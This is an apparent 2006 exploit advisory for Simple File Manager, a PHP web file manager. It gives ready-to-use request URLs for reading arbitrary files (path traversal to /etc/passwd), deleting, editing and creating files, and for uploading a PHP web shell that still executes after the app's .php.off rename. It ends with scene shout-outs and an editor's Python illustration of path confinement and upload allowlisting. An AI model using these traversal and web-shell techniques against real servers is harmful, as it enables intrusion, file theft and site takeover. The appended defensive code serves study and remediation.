/*******************************************\
| flame vs Simple File Manager <=0.24=>     |
| http://onedotoh.sourceforge.net/          |
| Various Vulnerabilities Including:        |
\*******************************************/

/+++++++++++++++++++++++++++++++++++++++++++\
| Using the scripts supplied by the webapp: |
| Reading of Arbitrary files                |
| Deletion of Arbitrary files               |
| Modification of Arbitrary files           |
| Creation of Arbitrary files               |
| Uploading of Malicious files              |
\+++++++++++++++++++++++++++++++++++++++++++/

/&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&\
| Simple File Manager (SFM) is a web based  |
| file management utility.                  |
| It is designed to be used by those that   |
| don't want to use ftp or SHOULD NOT use   |
| ftp. It can be dropped into a specific    |
| directory and give access to that         |
| directory as well as any directory below  |
| it, including those created by SFM. It    |
| can be placed in a specific directory and |
| configured to give access to other        |
| directories outside of its location       |
| (centralized). SFM gives its user upload, |
| rename, delete, directory creation as     |
| well as directory navigation (within its  |
| tree limits), as well as Create New File; |
| it also includes an image viewer, text    |
| viewer and mime type downloading.         |
\&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&/
 /^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\
 | That's the description from the author... |
 | Which basically outlines all of its       |
 | vulnerabilities.                          |
 \__________________________________________/

/=========================================================================================================================\
############################ .:Reading of Arbitrary Files:. ##############################################################
# fm.php?action=download&filename=[RELATIVE PATH / FILENAME]&pathext=&u=&&copt=1&sortKey=2                                #
# EG: http://www.site.com/file/fm.php?action=download&filename=../../../../../../etc/passwd&pathext=&u=&&copt=1&sortKey=2 #
###########################################################################################################################
\=========================================================================================================================/

/=========================================================================================================================\
############################ .:Deletion of Arbitrary Files:. #############################################################
# fm.php?delete=[RELATIVE PATH / FILENAME]&copt=1&sortKey=2&u=&pathext=                                                   #
# EG: http://www.site.com/file/fm.php?delete=phpshell.php&copt=1&sortKey=2&u=&pathext=                                    #
###########################################################################################################################
\=========================================================================================================================/

/=========================================================================================================================\
############################# .:Modification of Arbitrary Files:. ########################################################
# fm.php?edit=[RELATIVE PATH / FILENAME]&u=&copt=1&pathext=                                                               #
# EG: http://www.site.com/file/fm.php?edit=../index.php&u=&copt=1&pathext=                                                #
###########################################################################################################################
\=========================================================================================================================/

/=========================================================================================================================\
############################# .:Creation of Arbitrary Files:. ############################################################
# START LOCAL HTML FILE:                                                                                                  #
Filename:
# END LOCAL HTML FILE                                                                                                     #
###########################################################################################################################
# Note... various characters are escaped, and by default any new file ending in .php is renamed to file.php.off.          #
# Note... the rename is moot: the edit action lets you modify existing .php files, including fm.php itself                #
#         (*see Modification of Arbitrary Files).                                                                         #
###########################################################################################################################
\=========================================================================================================================/

/=========================================================================================================================\
############################## .: Uploading of Malicious Files:. #########################################################
# START LOCAL HTML FILE:                                                                                                  #
# END LOCAL HTML FILE                                                                                                     #
###########################################################################################################################
# Note... by default uploaded .php files are renamed to file.php.off, but you can usually browse to the renamed file      #
#         anyway and it will execute... EG: http://www.site.com/file/phpshell.php.off                                     #
#         This works because Apache's mod_mime treats every dot-separated suffix as an extension: with AddHandler mapping #
#         .php, phpshell.php.off still matches .php and is handed to the PHP interpreter; appending .off is not a safe    #
#         neutralisation.                                                                                                 #
###########################################################################################################################
\=========================================================================================================================/

/++++++++++++++++++++++++++++\
| Be good, and don't be too  |
| hopeful about finding      |
| yourself a gibbon running  |
| this script. It predates   |
| my #999999 hair.           |
\++++++++++++++++++++++++++++/

/{S}{H}{O}{U}{T}{-}{O}{U}{T}{S}{!}{!}{!}\
|---------------------------------------|
| <&bk> stfu flame                      |
| <~PhaZe_One> no fame without flame    |
| <+c|p> I love you flame               |
| <%emc2> flame wishes death upon you   |
| are you emo flame?                    |
| <&[myg0t]40> flame don't be mad       |
| *~str0ke humps flame's leg            |
| <&ZoNe_VoRTeX> <3 flame               |
|---------------------------------------|
\{S}{H}{O}{U}{T}{-}{O}{U}{T}{S}{!}{!}{!}/

# milw0rm.com [2006-12-02]
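Appended example (editor's addition, not code from Simple File Manager or from the advisory). SFM is a PHP application; the Python below is an illustration of the two checks the advisory shows it lacked, not the project's own code, and the names BASE, naive_resolve, confined_resolve, sfm_style_rename, served_by_php_handler, safe_stored_name and the allowlist are hypothetical. It shows why the download/edit/delete path `../../../../../../etc/passwd` escapes the managed directory and what a confinement check looks like, and why the `.php.off` rename used for uploads and new files still yields a PHP-executed `phpshell.php.off` under Apache's AddHandler extension matching, next to an allowlist alternative.

```python
"""Added example, not Simple File Manager code.

Two checks the advisory shows SFM lacked, reimplemented in Python for
illustration (SFM itself is PHP; all names here are hypothetical):
  1. confining a user-supplied relative path to the managed directory;
  2. neutralising uploaded/created file names so no dot-segment can be
     picked up by a handler-by-extension web server configuration.
"""
import posixpath
from typing import Optional

# Constructed directory that SFM would be "dropped into"; nothing on disk is touched.
BASE = "/var/www/html/file"


def naive_resolve(base: str, user_path: str) -> str:
    """The vulnerable pattern: join the user-supplied relative path and use it."""
    return posixpath.normpath(posixpath.join(base, user_path))


def confined_resolve(base: str, user_path: str) -> Optional[str]:
    """Return the normalised target only if it stays inside `base`, else None.

    Only the string-level check is shown. On a live filesystem both sides must
    also go through os.path.realpath() so that a symlink inside the tree
    cannot point outside it.
    """
    if "\x00" in user_path or user_path.startswith("/"):
        return None
    base_norm = posixpath.normpath(base)
    target = posixpath.normpath(posixpath.join(base_norm, user_path))
    # Compare against "base/" so a sibling such as /var/www/html/file2 is rejected.
    if target != base_norm and not target.startswith(base_norm + "/"):
        return None
    return target


# Extensions a PHP handler is typically bound to.
PHP_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml"}
# Constructed allowlist of what the file manager is meant to store.
ALLOWED_UPLOAD_EXTENSIONS = {"txt", "png", "jpg", "gif", "pdf"}


def sfm_style_rename(filename: str) -> str:
    """The mitigation the advisory describes: append .off to .php files."""
    return filename + ".off" if filename.lower().endswith(".php") else filename


def served_by_php_handler(filename: str) -> bool:
    """Apache AddHandler semantics: every segment after the first dot is an
    extension, so 'phpshell.php.off' carries the extensions php and off and
    is still dispatched to PHP."""
    return any(seg.lower() in PHP_EXTENSIONS for seg in filename.split(".")[1:])


def safe_stored_name(filename: str) -> Optional[str]:
    """Allowlist the final extension and neutralise every other dot, so no
    inner segment can be matched as a handler extension. Returns None when
    the file should be rejected rather than renamed."""
    stem, dot, ext = filename.rpartition(".")
    if not dot or not stem or ext.lower() not in ALLOWED_UPLOAD_EXTENSIONS:
        return None
    return stem.replace(".", "_") + "." + ext.lower()


if __name__ == "__main__":
    payload = "../../../../../../etc/passwd"  # the advisory's download example
    print("naive   :", naive_resolve(BASE, payload))
    print("confined:", confined_resolve(BASE, payload))
    print("confined:", confined_resolve(BASE, "docs/readme.txt"))
    renamed = sfm_style_rename("phpshell.php")
    print(renamed, "served by PHP handler:", served_by_php_handler(renamed))
    print("allowlist:", safe_stored_name("phpshell.php"), safe_stored_name("report.v2.pdf"))
```

Run it directly to see the naive join land on /etc/passwd while the confined variant returns None, and the renamed upload still flagged as PHP-executable while the allowlist version either rejects it or collapses the inner dots.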